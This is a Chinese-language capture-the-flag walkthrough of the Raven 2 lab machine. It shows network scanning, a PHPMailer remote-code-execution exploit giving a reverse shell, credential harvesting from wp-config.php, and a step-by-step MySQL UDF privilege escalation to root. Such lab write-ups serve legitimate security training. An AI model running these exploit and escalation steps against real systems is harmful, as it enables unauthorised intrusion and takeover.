基本信息
靶机
靶机地址:
Download: https://drive.google.com/open?id=1fXp4JS8ANOeClnK63LwgKXl56BqFJ23z
Download (Mirror): https://download.vulnhub.com/raven/Raven2.ova
Download (Torrent): https://download.vulnhub.com/raven/Raven2.ova.torrent ( Magnet)
靶机难度:中等
靶机描述:Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach Raven?
知识点、工具
nmap
dirb
searchsploit
phpmailer
mysql udf
gcc 编译
python -m SimpleHTTPServer
python -c 'import pty;pty.spawn("/bin/bash")'
nc
信息收集
先扫描靶机地址:
对靶机进行全端口扫描:
sudo nmap -p- -sV -v 192.168.10.129
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
33997/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:B8:7E:93 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
使用nmap脚本对端口扫描:
nmap -A -T4 -p 22,80,111,33997 --script=vuln -v 192.168.10.129
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.10.129
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.10.129:80/
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.10.129:80/team.html
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.10.129:80/service.html
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.10.129:80/contact.php
| Form id: myform
| Form action:
|
| Path: http://192.168.10.129:80/contact.php
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.10.129:80/wordpress/
| Form id: search-form-5f1a943b4364f
|_ Form action: http://raven.local/wordpress/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wordpress/: Blog
| /wordpress/wp-login.php: Wordpress login page.
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| /img/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| /manual/: Potentially interesting folder
|_ /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_http-server-header: Apache/2.4.10 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.10:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
| CVE-2014-3583 5.0 https://vulners.com/cve/CVE-2014-3583
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
111/tcp open rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33997/tcp status
| 100024 1 50667/tcp6 status
| 100024 1 52526/udp status
|_ 100024 1 60374/udp6 status
33997/tcp open status 1 (RPC #100024)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
目录扫描,使用dirb对目录进行扫描,访问扫描出来的目录:
在/vendor/PATH发现flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}
在查看到有一个PHPMailerAutoload.php,PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务,并且从REDADME.txt中发现版本为5.2,继续查看在VERSION发现版本为5.2.16;
这个还有扫出来有价值的就是wordpress
漏洞利用
1、可以在searchsploit,查看phpmailer是不是可以利用,从搜索结果来看,5.2.16可以通过很多脚本来执行远程代码执行漏洞,先选择python来尝试
2、使用msf利用phpmailer,利用不成功
3、使用python脚本来执行,先下载40974.py,在查看使用的方法
Usage:
1 - Config your IP for reverse shell on payload variable
2 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py
修改脚本:
靶机IP:192.168.10.129
kali:192.168.10.128
contact为靶机发送邮件的页面
脚本开始加上# -- coding: utf-8 --防止编码报错:
打开终端,监听对应端口:
执行脚本(执行脚本的时候需要使用python3来执行):
访问http://192.168.10.129/contact.php 触发生成logg12.php后门,在去访问http://192.168.10.129/log12.php 反弹shell
用python切换到交互shell python -c ‘import pty;pty.spawn("/bin/bash")’
通过执行 find / -name “flag*” 查找flag;
提取
1、提取需要获得更多的linux服务器的信息
2、上传LinEnum.sh
kali上使用python服务器监听8000 端口
在靶机中下载对应的文件
3、执行LinEnumerate.sh 查看信息
找到wordpress的目录,然后找到配置文件 /var/www/html/wordpress/wp-config.php
看到数据库的用户名和密码:
登录数据库,并查看版本,数据库版本为5.5.60:
可以使用1518.c来提权:
编译文件:
gcc -g -c 1518.c
gcc -g -shared -o 1518.so 1518.o -lc
生成1518.so文件,将这个文件上传至靶机:
提取步骤:
Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf2.c
* $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
* mysql> create function do_system returns integer soname 'raptor_udf2.so';
* mysql> select * from mysql.func;
* +-----------+-----+----------------+----------+
* | name | ret | dl | type |
* +-----------+-----+----------------+----------+
* | do_system | 2 | raptor_udf2.so | function |
* +-----------+-----+----------------+----------+
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
*
* E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys
获得flag4.txt
总结
了解phpmailerd的远程代码执行漏洞
- 1 - Config your IP for reverse shell on payload variable
- 2 - Open nc listener in one terminal: $ nc -lnvp
- 3 - Open other terminal and run the exploit: python3 anarcoder.py
主要是先该脚本,然后去访问contact页面,生成一个后门,在去访问这个后面,反弹一个shell到kali
mysql的udf提权
- 1、gcc -g -c raptor_udf2.c
- 2、gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
- 3、mysql -u root -p
- 4、mysql> use mysql;
- 5、mysql> create table foo(line blob);
- 6、mysql> insert into foo values(load_file(’/home/raptor/raptor_udf2.so’));
- 7、mysql> select * from foo into dumpfile ‘/usr/lib/raptor_udf2.so’;
- 8、mysql> create function do_system returns integer soname ‘raptor_udf2.so’;
- 9、mysql> select * from mysql.func;
*10、 mysql> select do_system(‘id > /tmp/out; chown raptor.raptor /tmp/out’);
*11、mysql> ! sh
(仅仅用于记录学习)